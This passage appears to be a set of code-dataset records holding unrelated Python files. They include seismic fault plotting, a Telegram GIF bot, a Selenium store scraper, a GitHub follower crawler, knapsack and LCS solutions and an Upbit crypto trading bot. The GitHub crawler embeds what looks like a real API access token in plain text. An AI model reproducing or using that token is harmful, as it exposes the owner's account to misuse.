data['nt1'][i]\n n2 = data['nt2'][i]\n n3 = data['nt3'][i]\n s1 = data['sv1'][i1:i1+n1]\n s2 = data['sv2'][i2:i2+n2]\n s3 = data['sv3'][i3:i3+n3]\n t1 = t0[i], t0[i] + dt[i] * (n1 - 1)\n t2 = t0[i], t0[i] + dt[i] * (n2 - 1)\n t3 = t0[i], t0[i] + dt[i] * (n3 - 1)\n s1 = interp.interp1(t1, s1, t, s(t), interp, bound=True)\n s2 = interp.interp1(t2, s2, t, s(t), interp, bound=True)\n s3 = interp.interp1(t3, s3, t, s(t), interp, bound=True)\n ii = np.array([[jj[i], kk[i], ll[i]]], 'i')\n mm = np.array([\n m1[0,0,i] * s1 + m2[0,0,i] * s2 + m3[0,0,i] * s3,\n m1[0,1,i] * s1 + m2[0,1,i] * s2 + m3[0,1,i] * s3,\n m1[0,2,i] * s1 + m2[0,2,i] * s2 + m3[0,2,i] * s3,\n m1[1,1,i] * s1 + m2[1,1,i] * s2 + m3[1,1,i] * s3,\n m1[1,0,i] * s1 + m2[1,0,i] * s2 + m3[1,0,i] * s3,\n m1[1,2,i] * s1 + m2[1,2,i] * s2 + m3[1,2,i] * s3,\n ])\n if binary:\n mm.astype('f').tofile(fh)\n else:\n np.savetxt(fh, ii, '%d')\n np.savetxt(fh, mm.T, '%14.6e')\n i1 += n1\n i2 += n2\n i3 += n3\n return\n\n\ndef plot(srf, key='slip1', clim=[0, 10], scale=0.1, cmap='wbgr'):\n \"\"\"\n Plot fault surface for simple plane geometry only.\n \"\"\"\n import numpy as np\n from matplotlib import pyplot\n from . import coord\n from . import plt\n\n # extract data\n meta, data = srf\n slip = data[key]\n trup = data['t0']\n x, y = meta['plane'][0]['length']\n delta = meta['plane'][0]['delta']\n strike = meta['plane'][0]['strike']\n\n # dimensions\n x *= 0.001\n y *= 0.001\n extent = 0, x, 0, y\n axis = 0, x, y, 0\n\n # setup figure\n tic = 0.005 * pyplot.rcParams['font.size']\n x = 6 * tic + scale * x\n y = 8 * tic + scale * y\n axes = 4 * tic / x, 4 * tic / y, (x - 6 * tic) / x, (y - 8 * tic) / y\n tic /= scale\n fig = pyplot.figure(None, [x, y], 100, 'w')\n ax = fig.add_axes(axes)\n\n # slip image\n cmap = plt.colormap(cmap)\n im = ax.imshow(\n slip.T,\n cmap = cmap,\n extent = extent,\n origin = 'lower',\n interpolation = 'nearest',\n )\n im.set_clim(*clim)\n\n # rupture contours\n m, n = trup.shape\n x, y = 0.5 + np.mgrid[0:m,0:n]\n x *= 0.001 * delta[0]\n y *= 0.001 * delta[1]\n c = range(int(trup.max() + 1))\n ax.contour(x, y, trup, c, colors='k')\n\n # direction labels\n a = coord.compass(strike + 180.0)\n b = coord.compass(strike)\n ax.text(0, -tic, a, va='baseline', ha='left')\n ax.text(axis[1], -tic, b, va='baseline', ha='right')\n\n # length scales\n ax.axis('image')\n ax.axis(axis)\n x = ax.get_xlim()\n y = ax.get_ylim()[0] + 2 * tic\n plt.lengthscale(ax, x, [y, y], 2 * tic, '%g km', backgroundcolor='w')\n x = -2 * tic\n y = ax.get_ylim()\n plt.lengthscale(ax, [x, x], y, 2 * tic, '%g km', backgroundcolor='w')\n\n # ticks\n ax.set_xticks([])\n ax.set_yticks([])\n\n return fig\n\n\ndef write_coulomb(path, srf, proj, scut=0):\n \"\"\"\n Write Coulomb input file.\n\n Parameters\n ----------\n path: fine name on disk\n srf: (meta, data) SRF dictionaries\n proj: PyProj map projection instance\n scut: slip-rate below which values are not output\n \"\"\"\n import math\n import numpy as np\n from . import coord\n\n # slip components\n meta, data = srf\n s1, s2 = data['slip1'], data['slip2']\n s = np.sin(math.pi / 180.0 * data['rake'])\n c = np.cos(math.pi / 180.0 * data['rake'])\n r1 = -c * s1 + s * s2\n r2 = s * s1 + c * s2\n\n # coordinates\n x, y, z = data['lon'], data['lat'], data['dep']\n rot = coord.rotation(x, y, proj)[1]\n x, y = proj(x, y)\n x *= 0.001\n y *= 0.001\n z *= 0.001\n delta = 0.0005 * meta['plane'][0]['delta'][0]\n dx = delta * np.sin(math.pi / 180.0 * (data['stk'] + rot))\n dy = delta * np.cos(math.pi / 180.0 * (data['stk'] + rot))\n dz = delta * np.sin(math.pi / 180.0 * data['dip'])\n x1, x2 = x - dx, x + dx\n y1, y2 = y - dy, y + dy\n z1, z2 = z - dz, z + dz\n\n # source file\n i = (s1**2 + s2**2) > (np.sign(scut) * scut**2)\n c = np.array([x1[i], y1[i], x2[i], y2[i], r1[i], r2[i], data['dip'][i], z1[i], z2[i]]).T\n with open(path + 'source.inp', 'w') as fh:\n fh.write(coulomb_header.format(**meta))\n np.savetxt(fh, c, coulomb_fmt)\n fh.write(coulomb_footer)\n\n # receiver file\n s1.fill(0.0)\n c = np.array([x1, y1, x2, y2, s1, s1, data['dip'], z1, z2]).T\n with open(path + 'receiver.inp', 'w') as fh:\n fh.write(coulomb_header.format(**meta))\n np.savetxt(fh, c, coulomb_fmt)\n fh.write(coulomb_footer)\n return\n\n\ncoulomb_fmt = ' 1' + 4*' %10.4f' + ' 100' + 5*' %10.4f' + ' Fault 1'\n\ncoulomb_header = \"\"\"\\\nheader line 1\nheader line 2\n#reg1= 0 #reg2= 0 #fixed= {nsource} sym= 1\n PR1= 0.250 PR2= 0.250 DEPTH= 12.209\n E1= 8.000e+005 E2= 8.000e+005\nXSYM= .000 YSYM= .000\nFRIC= 0.400\nS1DR= 19.000 S1DP= -0.010 S1IN= 100.000 S1GD= 0.000\nS2DR= 89.990 S2DP= 89.990 S2IN= 30.000 S2GD= 0.000\nS3DR= 109.000 S3DP= -0.010 S3IN= 0.000 S3GD= 0.000\n\n # X-start Y-start X-fin Y-fin Kode rt.lat reverse dip angle top bot\nxxx xxxxxxxxxx xxxxxxxxxx xxxxxxxxxx xxxxxxxxxx xxx xxxxxxxxxx xxxxxxxxxx xxxxxxxxxx xxxxxxxxxx xxxxxxxxxx\n\"\"\"\n\ncoulomb_footer = \"\"\"\n Grid Parameters\n 1 ---------------------------- Start-x = -100.0\n 2 ---------------------------- Start-y = 0.0\n 3 -------------------------- Finish-x = 500.0\n 4 -------------------------- Finish-y = 400.0\n 5 ------------------------ x-increment = 5.0\n 6 ------------------------ y-increment = 5.0\n Size Parameters\n 1 -------------------------- Plot size = 2.0\n 2 -------------- Shade/Color increment = 1.0\n 3 ------ Exaggeration for disp.& dist. = 10000.0\n\n Cross section default\n 1 ---------------------------- Start-x = -126.4\n 2 ---------------------------- Start-y = -124.6\n 3 -------------------------- Finish-x = 40.0\n 4 -------------------------- Finish-y = 40.0\n 5 ------------------ Distant-increment = 1.0\n 6 ---------------------------- Z-depth = 30.0\n 7 ------------------------ Z-increment = 1.0\n Map info\n 1 ---------------------------- min. lon = -128.0\n 2 ---------------------------- max. lon = -123.0\n 3 ---------------------------- zero lon = -125.0\n 4 ---------------------------- min. lat = 39.5\n 5 ---------------------------- max. lat = 42.5\n 6 ---------------------------- zero lat = 40.0\n\"\"\"\n\n","sub_path":"cst/srf.py","file_name":"srf.py","file_ext":"py","file_size_in_byte":17910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"251297425","text":"#encoding:utf-8\n\nimport os\n\nfrom utils import get_url, download_file, telegram_autoplay_limit\n\n\nsubreddit = 'gifs'\nt_channel = '@r_gifs'\n\n\ndef send_post(submission, bot):\n what, gif_url, _ = get_url(submission)\n if what != 'gif':\n return False\n\n title = submission.title\n link = submission.short_link\n\n if submission.over_18:\n url = submission.url\n text = 'NSFW\\n{}\\n{}\\n\\n{}\\n\\nby @r_gifs'.format(url, title, link)\n bot.sendMessage(t_channel, text, disable_web_page_preview=True)\n return True\n\n # Download gif\n if not download_file(gif_url, 'r_gifs.gif'):\n return False\n # Telegram will not autoplay big gifs\n if os.path.getsize('r_gifs.gif') > telegram_autoplay_limit:\n return False \n text = '{}\\n{}\\n\\nby @r_gifs'.format(title, link)\n f = open('r_gifs.gif', 'rb')\n bot.sendDocument(t_channel, f, caption=text)\n f.close()\n return True\n","sub_path":"channels/r_gifs/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"383575823","text":"#\n# @lc app=leetcode id=2 lang=python3\n#\n# [2] Add Two Numbers\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n sum = ListNode(0)\n if l1 or l2:\n if l1 == None:\n l1 = ListNode(0)\n elif l2 == None:\n l2 = ListNode(0)\n add = l1.val + l2.val \n sum.val = add%10\n carry = 1 if add >= 10 else 0\n if carry:\n if l1.next == None:\n l1.next = ListNode(0)\n l1.next.val += 1\n sum.next = self.addTwoNumbers(l1.next, l2.next)\n elif sum.val == 0:\n return None \n return sum\n \n# @lc code=end\n\n","sub_path":"2.add-two-numbers.py","file_name":"2.add-two-numbers.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"646294326","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport pandas as pd\nfrom time import *\n\nurl = \"https://smartstore.naver.com/lilydress\"\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--start-maximized\")\n# options.add_argument(\"headless\")\n\ndriver = webdriver.Chrome(options=options)\ndriver.implicitly_wait(1)\ndriver.get(url)\n\nelement = driver.find_element_by_css_selector(\"#container > div._1XbSLEY_rb > div > div.kKWaaZzr6M > div > div > div._1AJ8D2PjS4._3nO3wKj4-Z > div > ul._3AV7RVieRB > li:nth-child(1)\")\n# driver.execute_script('arguments[0].scrollIntoView(true);arguments[0].click();', element)\nActionChains(driver).move_to_element(element).click(element).perform()\n\nurls = []\npage = 1\n\nwhile True:\n for num in range(1,41):\n try:\n element = driver.find_element_by_css_selector(\"#CategoryProducts > ul > li:nth-child({0})\".format(num))\n except:\n break\n aa = element.get_attribute('outerHTML').split('\"')\n for i, data in enumerate(aa):\n if '/products/' in data:\n link = 'https://smartstore.naver.com' + data\n break\n urls.append(link)\n \n if page < 10:\n page += 1\n try:\n next_page = WebDriverWait(driver, 3, poll_frequency=0.05).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#CategoryProducts > div._1HJarNZHiI._2UJrM31-Ry._3F77jPGGAN > a:nth-child({0})\".format(str(page+1)))))\n except:\n break\n else:\n try:\n next_page = WebDriverWait(driver, 3, poll_frequency=0.05).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#CategoryProducts > div._1HJarNZHiI._2UJrM31-Ry._3F77jPGGAN > a.fAUKm1ewwo._2Ar8-aEUTq\")))\n except:\n break\n if '다음' in next_page.text:\n page = 1\n else:\n break\n driver.execute_script(\"arguments[0].scrollIntoView(true);arguments[0].click();\", next_page)\n sleep(0.5)\nurls = list(set(urls))\ndf = pd.DataFrame(urls)\ndf.to_csv('ss_urls.csv', encoding='utf-8-sig', mode='w')\n\ndriver.close()","sub_path":"20210702/url_smartstore.py","file_name":"url_smartstore.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"203317630","text":"# -*- coding: utf-8 -*-\n\nfrom github import Github\n\n\ndef get_follow_infos():\n g = Github(\"6be01d3dae80b1230fee8e8104d6772bb8922c9b\")\n repos = []\n repos.append(g.get_repo(\"elastic/elasticsearch\"))\n repos.append(g.get_repo(\"elastic/elasticsearch-hadoop\"))\n repos.append(g.get_repo(\"elastic/elasticsearch-metrics-reporter-java\"))\n stack = []\n done_pool = set()\n count = 0\n for repo in repos:\n if count >= 1:\n break\n cons = repo.get_contributors()\n if cons.totalCount < 3:\n continue\n for user in cons:\n if user and user.name:\n stack.append(user)\n count += 1\n print(\"start get the follow infos\")\n with open(\"follow.txt\", \"w\") as txt_file:\n while stack:\n user_tmp = stack.pop()\n if not user_tmp or not user_tmp.name:\n continue\n follower = user_tmp.get_followers()\n cnt = 0\n for u in follower:\n if cnt >= 99:\n break\n if not u or not u.name:\n continue\n if u.name not in done_pool:\n stack.append(u)\n res = \"%s %s\" %(u.name.replace(\" \", \"\"), user_tmp.name.replace(\" \", \"\"))\n print(res)\n txt_file.write(res + \"\\n\")\n cnt += 1\n done_pool.add(user_tmp.name)\n print(\"The task is done\")\n return\n\n\nif __name__ == \"__main__\":\n get_follow_infos()\n","sub_path":"server/data-extract/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"430610086","text":"\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nwith h5py.File('data/DPW1258PPG.mat', 'r') as f:\n key = list(f.keys())\n\n for i in key:\n data = f.get(i)\n a = list(data.keys())\n print(i, a)\n for x in list(data.values()):\n print(x.name.split('/')[-1], x.shape)\n for y in x:\n print(y)","sub_path":"parsematlab.py","file_name":"parsematlab.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"258869386","text":"from __future__ import print_function\nimport httplib2\nimport os\n\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\n\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/gmail-python-quickstart.json\nCLIENTSECRETS_LOCATION = '/home/akshay/work/fa/gmail_push_notifications/client_secret_enact.json'\nREDIRECT_URI = 'http://localhost:8090'\nSCOPES = [\n 'https://www.googleapis.com/auth/gmail.readonly',\n 'https://www.googleapis.com/auth/userinfo.email',\n 'https://www.googleapis.com/auth/userinfo.profile',\n # Add other requested scopes.\n]\nAPPLICATION_NAME = 'Gmail API Python Quickstart'\n\ndef get_authorization_url(email_address, state):\n \"\"\"Retrieve the authorization URL.\n\n Args:\n email_address: User's e-mail address.\n state: State for the authorization URL.\n Returns:\n Authorization URL to redirect the user to.\n \"\"\"\n flow = flow_from_clientsecrets(CLIENTSECRETS_LOCATION, ' '.join(SCOPES))\n flow.params['access_type'] = 'offline'\n flow.params['approval_prompt'] = 'force'\n flow.params['user_id'] = email_address\n flow.params['state'] = state\n return flow.step1_get_authorize_url(REDIRECT_URI)\n\ndef get_credentials():\n \"\"\"Gets valid user credentials from storage.\n\n If nothing has been stored, or if the stored credentials are invalid,\n the OAuth2 flow is completed to obtain the new credentials.\n\n Returns:\n Credentials, the obtained credential.\n \"\"\"\n url = get_authorization_url()\n\n home_dir = os.path.expanduser('~')\n credential_dir = os.path.join(home_dir, '.credentials')\n if not os.path.exists(credential_dir):\n os.makedirs(credential_dir)\n credential_path = os.path.join(credential_dir,\n 'enact-credentials.json')\n\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n flow.user_agent = APPLICATION_NAME\n if flags:\n credentials = tools.run_flow(flow, store, flags)\n else: # Needed only for compatibility with Python 2.6\n credentials = tools.run(flow, store)\n print('Storing credentials to ' + credential_path)\n return credentials\n","sub_path":"gmail_credentials.py","file_name":"gmail_credentials.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"502937126","text":"\"\"\"\n实现 strStr() 函数。\n\n给定一个 haystack 字符串和一个 needle 字符串,在 haystack 字符串中找出 needle 字符串出现的第一个位置 (从0开始)。��果不存在,则返回  -1。\n\n示例 1:\n\n输入: haystack = \"hello\", needle = \"ll\"\n输出: 2\n示例 2:\n\n输入: haystack = \"aaaaa\", needle = \"bba\"\n输出: -1\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n Sunday算法:\n 1、若匹配:则返回当前idx\n 2、不匹配:则查看待匹配字符串的后一位字符c:\n a 若c存在于pattern中,则idx = idx + 偏移表[c]\n b 否则,idx = idx + len(pattern)\n \"\"\"\n def strStr(self, haystack, needle):\n # 计算偏移表\n def calShiftMat(st):\n dic = {}\n for i in range(len(st)-1, -1, -1):\n if not dic.get(st[i]):\n dic[st[i]] = len(st) - i\n dic['ot'] = len(st) + 1\n return dic\n # 特判\n if len(needle) > len(haystack):\n return -1\n # 特判\n if needle == \"\":\n return 0\n # 初始化偏移表\n dic = calShiftMat(needle)\n idx = 0\n\n while idx+len(needle) <= len(haystack):\n # 待匹配的子字符串\n str_cut = haystack[idx:idx+len(needle)]\n # 若待匹配的子字符串与needle正好相匹配,则返回最开始的索引值idx\n if str_cut == needle:\n return idx\n else:\n # 若匹配到最后了还没匹配上,则返回-1\n if idx+len(needle) >= len(haystack):\n return -1\n # 不匹配的情况下,根据下一个字符的偏移,移动idx\n cur_c = haystack[idx+len(needle)]\n if dic.get(cur_c):\n idx += dic[cur_c]\n else:\n idx += dic['ot']\n return -1 if idx+len(needle) >= len(haystack) else idx\n\n\nclass Solution2:\n \"\"\"巧用str.index()函数\"\"\"\n def strStr(self, haystack, needle):\n return haystack.index(needle) if needle in haystack else -1\n\n\nclass Solutio3:\n \"\"\"暴力求解\"\"\"\n def strStr(self, haystack, needle):\n # 特判\n if not needle:\n return 0\n n1 = len(haystack)\n n2 = len(needle)\n if n1 < n2:\n return -1\n\n # 定义匹配函数\n def helper(idx):\n haystack_p = idx\n needle_q = 0\n while needle_q < n2:\n if haystack[haystack_p] != needle[needle_q]:\n return False\n else:\n haystack_p += 1\n needle_q += 1\n return True\n\n # 逐一匹配\n for i in range(n1 - n2 + 1):\n if helper(i):\n return i\n return -1\n","sub_path":"字符串/28-实现strStr().py","file_name":"28-实现strStr().py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"173928135","text":"import argparse\n\nparser = argparse.ArgumentParser('This code is to compute the max value for knapsack problem')\nparser.add_argument(dest='filename', metavar='filename')\nargs = parser.parse_args()\nprint(args.filename)\n\ndef readFile(fileName):\n sackSize = 0\n ret = []\n ret.append((0,0)) #move to 1\n with open(fileName, 'rt') as f:\n lineNum = 0\n for line in f:\n line = line.replace('\\n','')\n lineSplit = line.split()\n if lineNum == 0: \n sackSize = int(lineSplit[0])\n else:\n #value, weight\n ret.append((int(lineSplit[0]), int(lineSplit[1])))\n lineNum += 1\n return sackSize, ret\n\ndef bgKnapsack2(sackSize, sackItems):\n ret = 0\n sack = []\n #init\n sack.append([])\n for x in range(0,sackSize+1):\n sack[0].append(0)\n\n #main knapsack\n for i in range(1, len(sackItems)):\n firstRun = False\n for x in range(0, sackSize+1):\n if not firstRun:\n sack.append([])\n firstRun = True\n case1 = sack[len(sack)-1-1][x] #not including current item\n case2 = 0\n if (x-sackItems[i][1]) > 0 :\n case2 = sack[len(sack)-1-1][x-sackItems[i][1]] + sackItems[i][0]\n sack[len(sack)-1].append(max(case1, case2))\n if len(sack) == 3:\n sack.pop(0)\n #print (sack)\n ret = sack[1][sackSize]\n return ret\n\ndef bgKnapsack(sackSize, sackItems):\n ret = 0\n sack = []\n #idea\n #[i] --> list of ([weights] , value) \n\n #init\n sack.append([(range(0,sackSize+1), 0)])\n\n #main knapsack\n for i in range(1, len(sackItems)):\n print ('### observing item # : ' + str(i))\n firstRun = False\n for x in range(0, sackSize+1):\n if not firstRun:\n sack.append([([], 0)])\n firstRun = True\n case1 = 0\n case2 = 0\n #look for x in sack [i-1]\n #print (len(sack)-1-1)\n for sacSum in sack[len(sack)-1-1]:\n if x in sacSum[0]:\n case1 = sacSum[1]\n break\n if (x-sackItems[i][1]) > 0 :\n for sacSum in sack[len(sack)-1-1]:\n if x-sackItems[i][1] in sacSum[0]:\n case2 = sacSum[1] + sackItems[i][0]\n break\n currSum = max(case1, case2)\n sumFound = False\n for sacSum in sack[len(sack)-1]:\n if sacSum[1] == currSum:\n sacSum[0].append(x)\n sumFound = True\n break\n if not sumFound:\n sack[len(sack)-1].append(([x], currSum))\n #to minimize the array, delete th first array when there is 3 array\n if len(sack) == 3:\n sack.pop(0)\n #print (sack)\n #look for ret\n for sacSum in sack[1]:\n if sackSize in sacSum[0]:\n ret = sacSum[1]\n return ret\n\ndef smKnapsack(sackSize, sackItems):\n ret = 0\n sack = []\n #init\n sack.append([])\n for x in range(0,sackSize+1):\n sack[0].append(0)\n\n #main knapsack\n for i in range(1, len(sackItems)):\n for x in range(0, sackSize+1):\n if i >= len(sack):\n sack.append([])\n case1 = sack[i-1][x] #not including current item\n case2 = 0\n if (x-sackItems[i][1]) > 0 :\n case2 = sack[i-1][x-sackItems[i][1]] + sackItems[i][0]\n sack[i].append(max(case1, case2))\n #print (sack)\n ret = sack[len(sackItems)-1][sackSize]\n return ret\n\nsackSize, sackItems = readFile(args.filename)\nprint (sackSize)\noptimumValue2 = bgKnapsack2(sackSize, sackItems)\nprint (optimumValue2)\noptimumValue = smKnapsack(sackSize, sackItems)\nprint (optimumValue)","sub_path":"MP_11/knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"297134991","text":"def lcs(x, y):\n c = [[0] * (len(y) + 1) for i in range(len(x) + 1)]\n b = [[0] * (len(y) + 1) for i in range(len(x) + 1)]\n for i in range(1, len(x) + 1):\n for j in range(1, len(y) + 1):\n if x[i - 1] == y[j - 1]:\n c[i][j] = c[i - 1][j - 1] + 1\n b[i][j] = 1\n elif c[i - 1][j] >= c[i][j - 1]:\n c[i][j] = c[i - 1][j]\n b[i][j] = 2\n else:\n c[i][j] = c[i][j - 1]\n b[i][j] = 3\n return c, b\n\n\ndef print_lcs(b, x, i, j):\n if i == 0 or j == 0:\n return\n if b[i][j] == 1:\n print_lcs(b, x, i - 1, j - 1)\n print(x[i - 1], end='')\n elif b[i][j] == 2:\n print_lcs(b, x, i - 1, j)\n else:\n print_lcs(b, x, i, j - 1)\n\n\ndef print_matrix(m):\n for i in range(len(m)):\n for j in range(len(m[0])):\n print(m[i][j], end='\\t')\n print()\n\n\nimport random\nimport math\nimport time\nimport string\n\nif __name__ == '__main__':\n n = 250\n m = 640\n x = ''\n y = ''\n\n for i in range(m):\n x += random.choice(string.ascii_uppercase)\n for i in range(n):\n y += random.choice(string.ascii_uppercase)\n\n start = time.time()\n c, b = lcs(x, y)\n end = time.time() - start\n print('n={n},m={m}: time={time:.3f}'.format(n=n, m=m, time=end))","sub_path":"dynamic_programming/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"388901665","text":"# pyupbit install\n# !pip install pyupbit\n\n# 필요 라이브러리 import\nimport time\nimport pyupbit\nimport datetime\nimport requests\nimport numpy as np\nimport pandas as pd\n\n# 딥러닝을 구동하는 데 필요한 케라스 함수를 불러옵니다.\nimport keras\nimport tensorflow.keras.layers as Layer\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, BatchNormalization, Conv2D, MaxPooling2D, Flatten\n\n# 케라스 외의 필요한 라이브러리를 불러옵니다.\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\n\n# Ture가 나와야 GPU가 작동 되는 중 !\nfrom tensorflow.python.client import device_lib \ndevice_lib.list_local_devices() \ntf.test.is_gpu_available()\n\n## 개인정보 관리 주의 -----------------------------------------------##\naccess = \"####\"\nsecret = \"####\"\nmyToken = \"####\"\n##-------------------------------------------------------------------##\n\nupbit = pyupbit.Upbit(access, secret)\ntickers = pyupbit.get_tickers('KRW')\n\n# 잔고가 있을 때 오르는 종목 사고, 내리면 팔고\n# 등락폭 1% 기준으로 둠. \n# 1분 간격으로 확인\n\n# 수익률 저장\ndef save_earning_rate(df):\n earning_rate = df.sort_values(by = '수익률', axis = 0, ascending=False)\n print(earning_rate)\n # 수익률 csv 파일로 저장\n earning_rate.to_csv('./earning_rate.csv')\n\ncoin_dic = dict()\nearning_rate = pd.DataFrame(data = [[0, 0, 0, 0]]*len(tickers), columns=['현재 구매액', '수익', '총 구매액', '수익률'], index=tickers)\n\n# 코인 판매.\nfor item in tickers:\n coin_dic[item] = pyupbit.get_current_price(item)\n coin = upbit.get_balance(item)\n if coin:\n upbit.sell_market_order(item, coin)\n time.sleep(0.21)\n time.sleep(0.03)\n\nwhile True:\n buy_list = []\n time.sleep(60 - datetime.datetime.now().second)\n for item in tickers:\n current_price = pyupbit.get_current_price(item)\n time.sleep(0.03)\n margin = (current_price - coin_dic[item]) / current_price\n if margin > 0.01:\n coin_dic[item] = current_price\n buy_list.append(item)\n elif margin < -0.01:\n # 코인 판매.\n current_moeny = upbit.get_balance('KRW')\n coin = upbit.get_balance(item)\n if coin:\n upbit.sell_market_order(item, coin)\n tmp_money = upbit.get_balance('KRW')\n earning_rate['수익'][item] = tmp_money - current_moeny - earning_rate['현재 구매액'][item]\n earning_rate['현재 구매액'][item] = 0\n earning_rate['수익률'] = round(earning_rate['수익'] / earning_rate['총 구매액'] * 100, 2)\n save_earning_rate(earning_rate)\n # time.sleep(0.21)\n coin_dic[item] = current_price\n else:\n coin_dic[item] = current_price\n\n # 코인 구매\n if (upbit.get_balance('KRW') > 1000) and len(buy_list):\n buy_money = upbit.get_balance('KRW') / len(buy_list) * 0.70\n for item in buy_list:\n upbit.buy_market_order(item, buy_money)\n earning_rate['현재 구매액'][item] += buy_money\n earning_rate['총 구매액'][item] += buy_money\n time.sleep(0.21)\n save_earning_rate(earning_rate)\n","sub_path":"auto_trade.py","file_name":"auto_trade.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"425443785","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 20 19:00:27 2018\n\n@author: VeNoMzZxHD\n\"\"\"\n###\n# Returns tagged entities in training set directory as a list of dictionaries\n###\n\n\nimport re\nimport tkinter\nfrom tkinter.filedialog import askopenfilename, askdirectory\nimport glob\nimport os\n\ndef main():\n tkinter.Tk().withdraw()\n datasetDir = askdirectory()\n files = glob.glob(datasetDir + \"\\*.txt\") #returns list of filepath strings for each file in chosen dir\n \n file_dict = {}\n for file in files: # Iterates through every file in directory\n with open (file) as inFile:\n inString = preprocess(inFile.read()) #Reads entire file to string \n speaker = re.search('(.*?)', inString)\n stime = re.search('(.*?)', inString)\n etime = re.search('(.*?)', inString)\n location = re.search('(.*?)', inString)\n filename = os.path.basename(inFile.name)\n file_dict[filename] = {'speaker' : speaker, 'stime' : stime, 'etime' : etime, 'location' : location} # appends dict of filename: dict of tags\n print(file_dict.popitem()) \n \n### Unescapes file string \ndef preprocess(s):\n s = s.replace(\"\\r\",\"\")\n s = s.replace(\"\\n\",\"\")\n return s\n\nif __name__ == \"__main__\":\n main()\n \n###\n# returns all in files\n###\n\"\"\"\ntags = set()\n for file in files:\n with open (file) as inFile:\n inString = preprocess(inFile.read()) \n tags |= set(re.findall('<(.*?)>', inString))\n valid_tags = set()\n for tag in tags:\n if not '@' in tag and not '/' in tag:\n valid_tags.add(tag)\n print(valid_tags)\n\n\"\"\"\n\n ","sub_path":"TaggedExtractor.py","file_name":"TaggedExtractor.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"34920702","text":"# Динамическая типизация ----------\n# --------------------------------\n\n\n\ntemp_var_1 = input('Input smth: ')\nprint(temp_var_1, type(temp_var_1), id(temp_var_1))\n\ntemp_var_2 = input('Input smth 2: ')\nprint(temp_var_2, type(temp_var_2), id(temp_var_2))\n\n#temp_var_1 = temp_var_2\ntemp_var_1 = int(temp_var_2)\n\nprint(temp_var_1, type(temp_var_1), id(temp_var_1))\nprint()\n\n# Приведение типов\n\ndef is_digit(string):\n if string.isdigit():\n return True\n else:\n try:\n float(string)\n return True\n except ValueError:\n return False\n\n\ntemp_float = input('Input float number: ')\nprint('Here is string: ', temp_float, type(temp_float), id(temp_float))\nprint()\nif is_digit(temp_float):\n temp_float = float(temp_float)\n print('GRATZ! HERE IS FLOAT!!!', temp_float, type(temp_float), id(temp_float))\nelse:\n print('This is not number :(')","sub_path":"var_id.py","file_name":"var_id.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"356450788","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, val=0, next=None):\r\n# self.val = val\r\n# self.next = next\r\nclass Solution:\r\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\r\n def ln_to_int(l):\r\n res=[]\r\n while l:\r\n res.append(str(l.val))\r\n l=l.next\r\n return res\r\n \r\n l1=int(''.join(ln_to_int(l1)[::-1]))\r\n l2=int(''.join(ln_to_int(l2)[::-1]))\r\n r=list(str(l1+l2))\r\n r=r[::-1]\r\n head=ListNode()\r\n current=head\r\n for i in r:\r\n current.next=ListNode()\r\n current=current.next\r\n current.val=i\r\n return 